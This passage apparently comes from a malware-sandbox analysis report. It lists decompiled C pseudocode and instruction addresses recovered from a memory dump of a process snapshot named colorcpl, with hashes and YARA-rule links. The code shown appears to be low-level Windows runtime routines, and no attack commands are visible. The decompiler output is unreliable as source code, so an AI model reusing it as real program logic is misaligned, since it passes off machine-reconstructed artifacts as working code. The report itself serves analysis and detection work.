					return E04384B50(_t101, _t160, _v8 ^ _t206, _t197, _t201, _t202);
				}
				_t160 =  *(_t201 + 0x40);
				 *((intOrPtr*)(_t201 + 0x94)) = _t201 + 0xb0;
				 *((intOrPtr*)(_t201 + 0x84)) = ( *(_t201 + 0x92) & 0x0000ffff) + 0xb0 + _t201;
				_t202 = 1;
				_t164 = _t160 & 0x0000040b;
				if(_t164 == 0) {
					_t160 = _t160 | _t202;
					 *(_t201 + 0x40) = _t160;
					L4:
					if((_t160 & 0x02000000) != 0) {
						goto L31;
					}
					_t166 = _t160 & 0x00000400;
					if(_t166 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x80)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x80)) != _t197) {
							goto L31;
						}
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags =  *(_t201 + 0x4c) - _t197;
						if( *(_t201 + 0x4c) != _t197) {
							goto L31;
						}
					}
					_t107 =  *(_t201 + 0x4c);
					if(_t107 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags = _t107;
						if(_t107 < 0) {
							goto L31;
						}
					}
					if((_t160 & 0x00000006) == 6) {
						goto L31;
					}
					_t197 = 0xc000;
					if((_t160 & 0x0000c000) == 0xc000) {
						goto L31;
					}
					if((_t160 & 0x04000000) != 0) {
						__eflags = _t160 & 0x00000026;
						if((_t160 & 0x00000026) != 0) {
							goto L31;
						}
						__eflags = _t166;
						if(_t166 != 0) {
							goto L31;
						}
					}
					_t197 =  &_v60;
					if(E04381B63(_t201 + 0x90,  &_v60) == 0) {
						asm("lock dec dword [eax+ecx*8+0x4]");
						_t101 = 0xb7;
						goto L30;
					}
					_t197 =  &_v76;
					if(E04381AA0(_t201,  &_v76) != 0) {
						goto L30;
					}
					if(( *(_t201 + 0x40) & 0x00010000) != 0) {
						_t118 = ( *(_t201 + 0x92) & 0x0000ffff) + 0x000000b7 + ( *(_t201 + 0x82) & 0x0000ffff) & 0xfffffff8;
						_v68 =  *_t201 - _t118;
						_t205 = _t201 + _t118;
						_v72 = _t205;
						_t202 = _t205 | 0xffffffff;
					} else {
						if(( *(_t201 + 0x40) & 0x10000000) == 0) {
							_t202 =  *( *[fs:0x30] + 0x64);
						}
					}
					_t160 = _v76;
					_t197 = _t160;
					_v56 = _t160;
					_t202 = E04381763(_t201, _t160, _t202, _v72, _v68);
					_v60 = _t202;
					if(_t202 == 0) {
						asm("lock dec dword [eax+ebx*8+0x4]");
						_push(8);
						goto L32;
					} else {
						_push(0);
						_push(0x2c);
						_push( &_v52);
						_push(0);
						if(E04382D10() < 0) {
							_t101 = E0436ABA0(_t122);
							goto L30;
						}
						 *(_t202 + 0x8c) =  *(_t202 + 0x8c) - 0x00000001 + _v44 &  !(_v44 - 1);
						if(( *(_t202 + 0xd4) & 0x04000000) != 0) {
							_t127 = E044132C9(_t202);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L18;
							}
							_t160 = E0436ABA0(_t127);
							__eflags = _t160;
							if(_t160 == 0) {
								goto L18;
							}
							L50:
							__eflags =  *(_t201 + 0x58);
							if( *(_t201 + 0x58) != 0) {
								_push( *(_t201 + 0x58));
								E04382A80();
								 *(_t201 + 0x58) =  *(_t201 + 0x58) & 0x00000000;
								_t89 = _t202 + 0x68;
								 *_t89 =  *(_t202 + 0x68) & 0x00000000;
								__eflags =  *_t89;
							}
							E0437E363(_t202, _t197);
							L29:
							_t101 = _t160;
							goto L30;
						}
						L18:
						_t128 =  *(_t202 + 0xd4);
						if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
							L20:
							_t130 =  *(_t202 + 0x8c) + 0xffffffb8;
							if(_t130 >= 0xffff) {
								_t130 = 0xffff;
							}
							 *(_t202 + 0x90) = _t130 & 0xfffffff8;
							_t160 = E04380655(_t202);
							if(_t160 != 0) {
								goto L50;
							} else {
								if(( *(_t202 + 0xd4) & 0x00020000) == 0) {
									_t197 =  &_v80;
									_t160 = E04411A9E( *((intOrPtr*)(_t202 + 0x14)),  &_v80,  &_v64);
									__eflags = _t160;
									if(_t160 != 0) {
										goto L50;
									}
									 *((intOrPtr*)(_t202 + 0x17c)) = _v80;
								}
								_t180 = _v56;
								asm("lock inc dword [eax+ecx*8+0x4]");
								if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
									L26:
									E043803FA(_t201, _t202,  &_v64);
									_t141 =  *0x44341d4; // 0x0
									 *(_t141 + _v56 * 8) = _t202;
									_push(0);
									_t197 = 5;
									E04380344(_t202, _t197, _t230);
									L27:
									asm("lock dec dword [eax+ecx*8+0x4]");
									if(_t160 != 0) {
										goto L50;
									}
									 *_v84 =  *_t201;
									 *_v88 =  *_t201;
									goto L29;
								}
								_t147 = E043804D0(_t180, E043822A0, _t202);
								_t230 = _t147;
								if(_t147 == 0) {
									_t202 = _v60;
									_t160 =  *( *[fs:0x18] + 0x34);
									goto L27;
								}
								 *((intOrPtr*)(_t202 + 0x1c)) = _t147;
								goto L26;
							}
						}
						_t197 = _v72;
						if(E0438088E(_t202, _v72, _v68, _t128 >> 0x00000002 & 1) != 0) {
							_t160 = E0436ABA0(_t152);
							__eflags = _t160;
							if(_t160 != 0) {
								goto L50;
							}
						}
						goto L20;
					}
				}
				_t189 =  !_t164;
				_t156 = _t189 & 0x000000ff;
				_t190 = _t189 >> 8;
				_t157 = _t190 & 0x000000ff;
				_t191 = _t190 >> 8;
				_v56 = _t191;
				_t197 =  *((intOrPtr*)(_t156 + 0x431b330)) +  *((intOrPtr*)(_t157 + 0x431b330));
				if( *((intOrPtr*)((_t191 >> 8) + 0x431b330)) +  *((intOrPtr*)((_v56 & 0x000000ff) + 0x431b330)) +  *((intOrPtr*)(_t156 + 0x431b330)) +  *((intOrPtr*)(_t157 + 0x431b330)) != 1) {
					goto L31;
				}
				_t197 = 0;
				goto L4;
			}

0x043800b4
0x043800bd
0x043800c0
0x043800c3
0x043800c5
0x043800c8
0x043800d1
0x043800d4
0x043800d7
0x0438033f
0x0438033f
0x04380341
0x04380341
0x0438032e
0x0438033c
0x0438033c
0x043800dd
0x043800e6
0x043800fc
0x04380104
0x04380105
0x0438010b
0x043b93fb
0x043b93fd
0x04380150
0x04380156
0x00000000
0x00000000
0x0438015e
0x04380164
0x043b9405
0x043b940c
0x00000000
0x00000000
0x043b9412
0x043b9415
0x00000000
0x00000000
0x043b941b
0x043b941e
0x00000000
0x00000000
0x043b9424
0x0438016a
0x0438016f
0x043b9429
0x043b942c
0x00000000
0x00000000
0x043b9432
0x043b9434
0x00000000
0x00000000
0x043b943a
0x0438017c
0x00000000
0x00000000
0x04380182
0x0438018d
0x00000000
0x00000000
0x04380199
0x043b943f
0x043b9442
0x00000000
0x00000000
0x043b9448
0x043b944a
0x00000000
0x00000000
0x043b9450
0x043801a5
0x043801af
0x043b9460
0x043b9465
0x00000000
0x043b9465
0x043801b5
0x043801c1
0x00000000
0x00000000
0x043801ce
0x043b9486
0x043b948b
0x043b948e
0x043b9491
0x043b9494
0x043801d4
0x043801db
0x043801e3
0x043801e3
0x043801db
0x043801e9
0x043801f1
0x043801f3
0x043801fc
0x043801fe
0x04380203
0x043b94a1
0x043b94a6
0x00000000
0x04380209
0x04380209
0x0438020b
0x04380210
0x04380211
0x0438021a
0x043b94ae
0x00000000
0x043b94ae
0x04380231
0x04380241
0x043b94ba
0x043b94bf
0x043b94c1
0x00000000
0x00000000
0x043b94cd
0x043b94cf
0x043b94d1
0x00000000
0x00000000
0x043b94d7
0x043b94d7
0x043b94db
0x043b94dd
0x043b94e0
0x043b94e5
0x043b94e9
0x043b94e9
0x043b94e9
0x043b94e9
0x043b94ef
0x0438032c
0x0438032c
0x00000000
0x0438032c
0x04380247
0x04380247
0x04380252
0x04380272
0x0438027d
0x04380282
0x043b950a
0x043b950a
0x0438028d
0x04380298
0x0438029c
0x00000000
0x043802a2
0x043802ac
0x043b9519
0x043b9521
0x043b9523
0x043b9525
0x00000000
0x00000000
0x043b952a
0x043b952a
0x043802b7
0x043802ba
0x043802c9
0x043802e1
0x043802e9
0x043802ee
0x043802fb
0x043802fd
0x04380301
0x04380304
0x04380309
0x04380311
0x04380318
0x00000000
0x00000000
0x04380323
0x0438032a
0x00000000
0x0438032a
0x043802d1
0x043802d6
0x043802d8
0x043b953b
0x043b953e
0x00000000
0x043b953e
0x043802de
0x00000000
0x043802de
0x0438029c
0x04380254
0x0438026c
0x043b94ff
0x043b9501
0x043b9503
0x00000000
0x00000000
0x043b9505
0x00000000
0x0438026c
0x04380203
0x04380111
0x04380113
0x04380116
0x0438011f
0x04380122
0x04380125
0x0438012b
0x04380148
0x00000000
0x00000000
0x0438014e
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22383c1c13bc7d8277222b4eb3dfcb8462b77779e37d2ed8f7ab2e0a603e9de
Instruction ID: 242e83e33fe15223d80df75baab627b826e0c980af31b9366f0598eaa8c1fb43
Opcode Fuzzy Hash: b22383c1c13bc7d8277222b4eb3dfcb8462b77779e37d2ed8f7ab2e0a603e9de
Instruction Fuzzy Hash: 2BA1AC70B00B159BEB28EF65C980BAEF7B5FF44314F15502DEA5597681EB74B805CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04414080 Relevance: .3, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04414080(signed int __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				char _v53;
				intOrPtr _v56;
				char _v57;
				signed int* _v60;
				char _v61;
				intOrPtr _v100;
				void* _t107;
				intOrPtr* _t109;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int* _t131;
				intOrPtr _t138;
				intOrPtr _t142;
				intOrPtr _t147;
				signed int _t153;
				signed int _t156;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr _t161;
				signed int* _t167;
				signed int* _t168;
				intOrPtr _t170;
				signed int* _t174;
				intOrPtr _t176;
				signed int _t183;
				signed int _t189;
				signed int* _t190;
				intOrPtr _t191;
				unsigned int _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t210;
				signed int* _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr* _t222;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t226;
				intOrPtr _t230;
				unsigned int _t231;
				intOrPtr _t234;
				signed int _t238;
				signed int _t242;
				intOrPtr _t243;

				_t198 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_v12 = 0xfff0bdc0;
				L04352330(_t107, 0x4436884);
				_t109 =  *0x4433420; // 0x27108a8
				while(_t109 != 0x4433420) {
					_t222 = _t109;
					_v16 =  *_t109;
					_v28 = _t222 - 8;
					L043453C0(_t222 - 8);
					if( *((char*)(_t222 - 3)) == 0) {
						_v20 = _t222 - 0xbc;
						L04352330(_t222 - 0xbc, _t222 - 0xbc);
						_v44 = _v44 & 0x00000000;
						_push(4);
						_push( &_v44);
						_push(0xc);
						_push( *((intOrPtr*)(_t222 - 0xc4)));
						_v53 = 1;
						if(E043843A0() < 0) {
							L39:
							E043524D0(_v20);
							_push(_v32);
							goto L40;
						} else {
							_t234 = _v40;
							if(_t234 == 0) {
								goto L39;
							} else {
								_t189 = 0;
								_t238 = (_t234 + _t234 ^  *(_t222 + 0x24)) & 0x00000ffe ^  *(_t222 + 0x24);
								 *(_t222 + 0x24) = _t238;
								_t198 = _t238 >> 0x0000000b & 0x00000ffe;
								if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
									while(_t189 != 0x102) {
										_t183 = L043521D0(_t222 + 0x2c, _t222 - 0xbc,  &_v12, 0);
										_t238 =  *(_t222 + 0x24);
										_t189 = _t183;
										_t198 = _t238 & 0x00000ffe;
										if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
											continue;
										}
										goto L8;
									}
								}
								L8:
								if((_t238 & 0x007ff000) != 0) {
									_t121 =  *0x4436644; // 0x0
									_t125 = E04355D90(_t198,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t121 + 0x000c0000 | 0x00000008, (_t238 >> 0x0000000c & 0x000007ff) << 2);
									_v56 = _t125;
									_t190 = _t222 + 0x30;
									if(_t125 != 0) {
										_t201 =  *0x4436644; // 0x0
										_t198 = _t201 + 0x000c0000 | 0x00000008;
										_t131 = E04355D90(_t201 + 0x000c0000 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t201 + 0x000c0000 | 0x00000008, ( *(_t222 + 0x24) >> 0x0000000c & 0x000007ff) << 2);
										_v60 = _t131;
										if(_t131 != 0) {
											_t242 = 0;
											_t214 = _t131;
											_v32 = _v44 - _t131;
											while(1) {
												_t198 =  *_t190;
												if(_t198 == _t190) {
													break;
												}
												 *((intOrPtr*)(_t214 + _v32)) =  *((intOrPtr*)(_t198 + 8));
												_t190 = _t222 + 0x30;
												 *_t214 = _t198;
												_t158 =  *_t198;
												_v36 = _t158;
												if( *((intOrPtr*)(_t158 + 4)) != _t198) {
													goto L44;
												} else {
													_t167 =  *(_t198 + 4);
													if( *_t167 != _t198) {
														goto L44;
													} else {
														_t210 = _v36;
														_t242 = _t242 + 1;
														 *_t167 = _t210;
														_t214 =  &(_t214[1]);
														 *(_t210 + 4) = _t167;
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											E043524D0(_t222 - 0xbc);
											E043452F0(_t198, _t222 - 8);
											_v44 = _v44 & 0x00000000;
											_t191 = _v52;
											_t224 = 0;
											_v57 = 0;
											_v32 = _t242 >> 6;
											while(_t224 < _t242) {
												_t67 = _t224 + 0x40; // 0x40
												if(_t67 > _t242) {
													_t153 = _t242 & 0x0000003f;
												} else {
													_t153 = 0x40;
												}
												_t198 =  &_v12;
												_push( &_v12);
												_push(0);
												_push(0);
												_push(_t191);
												_push(_t153);
												if(E04382F60() != 0x102) {
													_t224 = _t224 + 0x40;
													_t156 = _v36 + 1;
													_t191 = _t191 + 0x100;
													_v36 = _t156;
													if(_t156 <= _v24) {
														continue;
													}
												}
												break;
											}
											if(_t242 != 0) {
												_t225 = _v48;
												_t193 = _v32;
												do {
													_push( *((intOrPtr*)(_t225 + _t193)));
													E04382A80();
													_t147 =  *0x4436644; // 0x0
													E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t147 + 0xc0000,  *_t225);
													_t225 = _t225 + 4;
													_t242 = _t242 - 1;
												} while (_t242 != 0);
											}
											_t138 =  *0x4436644; // 0x0
											E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t138 + 0xc0000, _v48);
											goto L38;
										} else {
											while(1) {
												_t242 =  *_t190;
												if(_t242 == _t190) {
													break;
												}
												_t198 =  *_t242;
												if( *(_t198 + 4) != _t242) {
													goto L44;
												} else {
													_t168 =  *(_t242 + 4);
													if( *_t168 != _t242) {
														goto L44;
													} else {
														 *_t168 = _t198;
														 *(_t198 + 4) = _t168;
														_push( *((intOrPtr*)(_t242 + 8)));
														E04382A80();
														_t170 =  *0x4436644; // 0x0
														E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t170 + 0xc0000, _t242);
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											L38:
											_t142 =  *0x4436644; // 0x0
											E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t142 + 0xc0000, _v44);
											if(_v61 != 0) {
												goto L39;
											}
											goto L41;
										}
									} else {
										while(1) {
											_t242 =  *_t190;
											if(_t242 == _t190) {
												break;
											}
											_t198 =  *_t242;
											if( *(_t198 + 4) != _t242) {
												L44:
												_t205 = 3;
												asm("int 0x29");
												_t159 = _t205;
												_v100 = _t159;
												_push(_t222);
												if(_t159 == 0) {
													L47:
													_t226 =  *0x7ffe03c0;
													_v20 = _t226;
												} else {
													_t226 =  *((intOrPtr*)(_t159 + 0x110));
													_v20 = _t226;
													if(_t226 == 0) {
														goto L47;
													}
												}
												_t206 =  *((intOrPtr*)(_t159 + 0x100));
												if(_t226 != _t206) {
													 *((intOrPtr*)(_t159 + 0x100)) = _t226;
													_t216 = _t226 - _t206;
													_v16 = _t216;
													if(_t216 != 0) {
														_t160 = _t159 + 8;
														_v24 = _t160;
														_push(_t190);
														_push(_t242);
														_t207 =  *_t160;
														_t161 =  *((intOrPtr*)(_t160 + 4));
														_v12 = _t161;
														do {
															_t217 = _t161;
															_t243 = _t207;
															_v28 = _t217;
															asm("lock cmpxchg8b [edi]");
															_t207 = _t243;
															_t161 = _t217;
															_v12 = _t161;
														} while (_t207 != _t243 || _t161 != _v28);
														_t230 = _v20;
														if(_t230 < 4) {
															_t231 = 4;
														} else {
															_t231 = _t230 + 1;
														}
														_t244 = _v36;
														_push(4);
														_push( &_v32);
														_push(8);
														_t105 = _t244 + 0x24; // 0x408bf455
														_push( *_t105);
														_v32 = _t231;
														E043843A0();
														_t159 = L04343722(_v36);
													}
												}
												return _t159;
											} else {
												_t174 =  *(_t242 + 4);
												if( *_t174 != _t242) {
													goto L44;
												} else {
													 *_t174 = _t198;
													 *(_t198 + 4) = _t174;
													_push( *((intOrPtr*)(_t242 + 8)));
													E04382A80();
													_t176 =  *0x4436644; // 0x0
													E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t176 + 0xc0000, _t242);
													continue;
												}
											}
											goto L58;
										}
										 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
										goto L39;
									}
								} else {
									 *(_t222 + 0x24) = _t238 & 0xfffff001;
									goto L39;
								}
							}
						}
					} else {
						_push(_v28);
						L40:
						E043452F0(_t198);
						L41:
						_t109 = _v16;
						continue;
					}
					L58:
				}
				return E043524D0(0x4436884);
				goto L58;
			}

0x04414080
0x0441408b
0x04414098
0x044140a0
0x044140a5
0x044143e6
0x044140af
0x044140b3
0x044140bb
0x044140bf
0x044140c8
0x044140db
0x044140df
0x044140e4
0x044140ed
0x044140ef
0x044140f0
0x044140f2
0x044140f8
0x04414104
0x044143d0
0x044143d4
0x044143d9
0x00000000
0x0441410a
0x0441410a
0x04414110
0x00000000
0x04414116
0x04414120
0x04414124
0x04414129
0x04414131
0x04414137
0x04414139
0x04414153
0x04414158
0x0441415b
0x0441416b
0x0441416f
0x00000000
0x00000000
0x00000000
0x0441416f
0x04414139
0x04414171
0x04414177
0x04414187
0x044141ab
0x044141b0
0x044141b4
0x044141b9
0x0441420f
0x04414223
0x04414234
0x04414239
0x0441423f
0x04414296
0x0441429a
0x0441429c
0x044142a0
0x044142a0
0x044142a4
0x00000000
0x00000000
0x044142ad
0x044142b0
0x044142b3
0x044142b5
0x044142b7
0x044142be
0x00000000
0x044142c4
0x044142c4
0x044142c9
0x00000000
0x044142cf
0x044142cf
0x044142d3
0x044142d4
0x044142d6
0x044142d9
0x00000000
0x044142d9
0x044142c9
0x00000000
0x044142be
0x044142de
0x044142ec
0x044142f5
0x044142fa
0x04414301
0x04414308
0x0441430a
0x0441430f
0x04414313
0x04414317
0x0441431c
0x04414325
0x0441431e
0x04414320
0x04414320
0x04414328
0x0441432c
0x0441432d
0x0441432f
0x04414331
0x04414332
0x0441433d
0x04414343
0x04414346
0x04414347
0x0441434d
0x04414355
0x00000000
0x00000000
0x04414355
0x00000000
0x0441433d
0x04414359
0x0441435b
0x0441435f
0x04414363
0x04414363
0x04414366
0x0441436d
0x04414381
0x04414386
0x04414389
0x04414389
0x04414363
0x0441438e
0x044143a7
0x00000000
0x04414241
0x04414241
0x04414241
0x04414245
0x00000000
0x00000000
0x04414247
0x0441424c
0x00000000
0x04414252
0x04414252
0x04414257
0x00000000
0x0441425d
0x0441425d
0x0441425f
0x04414262
0x04414265
0x0441426a
0x0441427f
0x00000000
0x0441427f
0x04414257
0x00000000
0x0441424c
0x04414286
0x044143ac
0x044143b0
0x044143c4
0x044143ce
0x00000000
0x00000000
0x00000000
0x044143ce
0x044141bb
0x044141bb
0x044141bb
0x044141bf
0x00000000
0x00000000
0x044141c1
0x044141c6
0x04414402
0x04414404
0x04414405
0x0441440f
0x04414411
0x04414414
0x04414417
0x04414426
0x04414426
0x0441442c
0x04414419
0x04414419
0x0441441f
0x04414424
0x00000000
0x00000000
0x04414424
0x0441442f
0x04414437
0x0441443b
0x04414441
0x04414443
0x04414446
0x04414448
0x0441444d
0x04414450
0x04414451
0x04414452
0x04414454
0x04414457
0x0441445a
0x0441445a
0x0441445c
0x04414461
0x04414474
0x0441447b
0x0441447d
0x0441447f
0x04414482
0x0441448b
0x04414491
0x04414498
0x04414493
0x04414493
0x04414493
0x04414499
0x0441449f
0x044144a1
0x044144a2
0x044144a4
0x044144a4
0x044144a7
0x044144aa
0x044144b1
0x044144b7
0x04414446
0x044144ba
0x044141cc
0x044141cc
0x044141d1
0x00000000
0x044141d7
0x044141d7
0x044141d9
0x044141dc
0x044141df
0x044141e4
0x044141f9
0x00000000
0x044141f9
0x044141d1
0x00000000
0x044141c6
0x04414200
0x00000000
0x04414200
0x04414179
0x0441417f
0x00000000
0x0441417f
0x04414177
0x04414110
0x044140ca
0x044140ce
0x044143dd
0x044143dd
0x044143e2
0x044143e2
0x00000000
0x044143e2
0x00000000
0x044140c8
0x04414401
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 270c20daa93e7b90ec0e7175fcb87665a9ab126e1bb062a53b619f96a3f1d953
Instruction ID: cfe37ba9235a93e45e1921cc8ba5a0c144871b1e77349835261e88c6ca18b4c6
Opcode Fuzzy Hash: 270c20daa93e7b90ec0e7175fcb87665a9ab126e1bb062a53b619f96a3f1d953
Instruction Fuzzy Hash: A1A1B9B2604602AFDB21DF24C980B6AB7E9FF48748F55052AE9899B760D734FC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04341051 Relevance: .3, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04341051(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				void* _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				intOrPtr _t160;
				signed int _t161;
				signed int _t172;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				char _t197;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr* _t206;
				intOrPtr _t207;
				char _t209;
				signed int _t210;
				intOrPtr _t214;
				intOrPtr* _t220;
				signed int _t222;
				signed int _t223;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				intOrPtr _t238;
				signed int _t239;
				void* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t247;

				_t246 = (_t244 & 0xfffffff8) - 0x6c;
				_v8 =  *0x443b370 ^ _t246;
				_t238 = __edx;
				_t226 = __ecx;
				_v36 = 0;
				_t204 = 6;
				_t232 =  &_v84;
				_v52 =  *((intOrPtr*)(__ecx + 0x48));
				_v40 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 = __edx;
				_v48 = __ecx;
				_t151 = memset(_t232, 0, _t204 << 2);
				_t247 = _t246 + 0xc;
				_t233 = _t232 + _t204;
				if(_v52 == 2) {
					_t234 =  *(_t226 + 0x60);
					_t200 =  *(_t226 + 0x64);
					_v63 =  *((intOrPtr*)(_t226 + 0x4c));
					_t153 =  *((intOrPtr*)(_t226 + 0x58));
					_v104 = _t153;
					_v76 = _t153;
					_t154 =  *((intOrPtr*)(_t226 + 0x5c));
					_v100 = _t154;
					_v72 = _t154;
					_t155 = 0;
					L19:
					_v80 = _t200;
					_v84 = _t234;
					L8:
					if( *((intOrPtr*)(_t226 + 0x74)) > 0) {
						_t81 = _t226 + 0x84; // 0x124
						_t206 = _t81;
						_v92 = _t206;
						while(1) {
							_t207 =  *_t206;
							if(_t207 >= 0 || _t207 == 0x80000000) {
								break;
							}
							_t155 = _t155 + 1;
							_t206 = _v92 + 0x10;
							_v92 = _t206;
							if(_t155 <  *((intOrPtr*)(_t226 + 0x74))) {
								continue;
							}
							goto L9;
						}
						_v88 = _t155 << 4;
						_t239 = _v88;
						_t209 = _t226 +  *((intOrPtr*)(_t239 + _t226 + 0x78));
						_v44 = _t209;
						asm("adc eax, [esi+edx+0x7c]");
						_v24 = 0;
						_v28 = _t209;
						_v20 =  *((intOrPtr*)(_t239 + _t226 + 0x80));
						_t160 =  *_v92;
						_v36 =  &_v28;
						_t238 = _v32;
						_v16 = _t160;
						if( *(_t226 + 0x4e) >= 0 || _t160 != 0x80000000) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t209 + 8)) = 0;
							 *((intOrPtr*)(_t209 + 0xc)) = 0;
							 *((intOrPtr*)(_t209 + 0x14)) = 0;
							 *((intOrPtr*)(_t209 + 0x10)) = _v20;
							_t214 = 0;
							_t172 = _t238 + 0x66;
							_v92 = 0;
							_v88 = _t172;
							do {
								if( *((char*)(_t172 - 2)) == 0) {
									goto L31;
								}
								_t214 = _v92;
								if(( *_t172 & 0x000000ff) == ( *(_t226 + 0x4e) & 0x7fff)) {
									_t172 = E04386600(1, _t214 + 0x20, 0);
									_t214 = _v44;
									 *(_t214 + 8) = _t172;
									 *((intOrPtr*)(_t214 + 0xc)) = 0;
									L34:
									if(_v40 == 0) {
										goto L9;
									}
									_t202 = _v40;
									_t121 = _t202 + 0x1c; // 0x1c
									_t236 = _t121;
									L04352330(_t172, _t121);
									 *((intOrPtr*)(_t202 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t176 =  *((intOrPtr*)(_t202 + 0x94));
									if( *((intOrPtr*)(_t202 + 0x94)) != 0) {
										E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t176);
									}
									_t180 = E04355D90(_t214,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
									 *((intOrPtr*)(_t202 + 0x94)) = _t180;
									if(_t180 != 0) {
										 *((intOrPtr*)(_t180 + 8)) = _v20;
										 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)) + 0xc)) = _v16;
										_t220 =  *((intOrPtr*)(_t202 + 0x94));
										 *_t220 = _t220 + 0x10;
										 *((intOrPtr*)(_t220 + 4)) = 0;
										E043888C0( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)))), _v28, _v20);
										_t247 = _t247 + 0xc;
									}
									 *((intOrPtr*)(_t202 + 0x20)) = 0;
									E043524D0(_t236);
									_t210 = _v76;
									_t161 = _v80;
									_t200 = _v84;
									_t234 = _v88;
									L10:
									_t227 =  *((intOrPtr*)(_t238 + 0x1c));
									_v44 = _t227;
									if(_t227 != 0) {
										 *0x44391e0(_v48 + 0x38, _v52, _v63, _t161, _t210, _t234, _t200, _v36,  *((intOrPtr*)(_t238 + 0x20)));
										_v44();
									}
									_pop(_t235);
									_pop(_t243);
									_pop(_t201);
									return E04384B50(0, _t201, _v8 ^ _t247, _t227, _t235, _t243);
								}
								_t172 = _v88;
								L31:
								_t214 = _t214 + 1;
								_t172 = _t172 + 0x18;
								_v92 = _t214;
								_v88 = _t172;
							} while (_t214 < 4);
							goto L34;
						}
					}
					L9:
					_t161 = _v104;
					_t210 = _v100;
					goto L10;
				}
				_t234 = _t233 | 0xffffffff;
				_t200 = _t234;
				_v84 = _t234;
				_v80 = _t200;
				if( *((intOrPtr*)(_t238 + 0x4c)) == _t151) {
					_t222 = _v72;
					_v105 = _v64;
					_t195 = _v76;
				} else {
					_t197 =  *((intOrPtr*)(_t238 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t197) {
						_v63 = _t197;
					}
					_t195 = _v76 |  *(_t238 + 0x40);
					_t222 = _v72 |  *(_t238 + 0x44);
					_t234 =  *(_t238 + 0x38);
					_t200 =  *(_t238 + 0x3c);
					_v76 = _t195;
					_v72 = _t222;
					_v84 = _t234;
					_v80 = _t200;
				}
				_v104 = _t195;
				_v100 = _t222;
				if( *((char*)(_t238 + 0xc4)) != 0) {
